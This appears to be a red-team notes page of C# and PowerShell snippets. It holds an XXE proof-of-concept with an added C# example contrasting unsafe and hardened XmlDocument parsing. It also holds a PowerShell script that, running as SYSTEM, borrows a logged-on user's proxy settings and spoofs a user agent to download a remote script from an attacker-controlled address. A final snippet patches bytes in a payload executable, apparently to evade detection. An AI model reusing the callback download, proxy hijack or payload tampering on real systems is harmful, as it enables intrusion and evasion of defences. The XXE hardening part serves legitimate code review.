C#
Install-Package Costura.Fody
XMLDocument PoC:
<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>
This works on .NET Framework <= 4.0 if the XmlResolver was not explicitly set to null (the default XmlUrlResolver fetches the SYSTEM entity).
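For code review, the parser configuration that leaves the PoC above effective beside the hardened configuration that blocks it. This is an added example, not code from the original page; the class and method names are assumptions, the payload string is the page's own PoC.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example (not from the original page). Demonstrates the two XmlDocument
// configurations a reviewer should distinguish when assessing the PoC above.
static class XxeDemo
{
    // The page's PoC: a SYSTEM entity pointing at a local listener.
    const string Payload =
        "<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>";

    // Weak form: on .NET Framework <= 4.0 XmlDocument ships with a default
    // XmlUrlResolver, so LoadXml follows the SYSTEM URI while expanding &win;.
    static string ParseUnsafe(string xml)
    {
        var doc = new XmlDocument();
        doc.LoadXml(xml);
        return doc.DocumentElement.InnerText;
    }

    // Hardened form: no resolver on the document or the reader, so external
    // entities are never fetched, and DTD processing is prohibited outright,
    // so the DOCTYPE itself is rejected with an XmlException.
    static string ParseSafe(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        var doc = new XmlDocument { XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            doc.Load(reader); // throws on the <!DOCTYPE ...> declaration
        }
        return doc.DocumentElement.InnerText;
    }

    static void Main()
    {
        try
        {
            ParseSafe(Payload);
            Console.WriteLine("unexpected: DOCTYPE was accepted");
        }
        catch (XmlException e)
        {
            Console.WriteLine("blocked: " + e.Message);
        }
    }
}
```

Grep a code base for `new XmlDocument()` followed by `Load`/`LoadXml` with no `XmlResolver = null` or `DtdProcessing.Prohibit` nearby to find the weak form.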
It will not verify through the chain but if the program does not check the whole chain it works ;-)
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$Assemblies | ForEach-Object {
    $_.Location
    $_.GetTypes() | ForEach-Object {
        $_ | Get-Member -Static | Where-Object {
            $_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods')
        }
    } 2> $null
}
Sometimes we execute as SYSTEM and still need to use the box's proxy settings to call back to us. In this case we can resolve the current proxy settings from the logged-on user's hive under HKEY_USERS and copy them.
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {
    if ($key.Name -like "*S-1-5-21-*") {
        $start = $key.Name.substring(10)
        break
    }
}
$proxy = (Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxy")
$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "Legit User Agent")
$wc.DownloadString("http://<ip>/script.ps1")
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")
$bytes[200] = 0xFF
[System.IO.File]::WriteAllBytes("payload.exe", $bytes)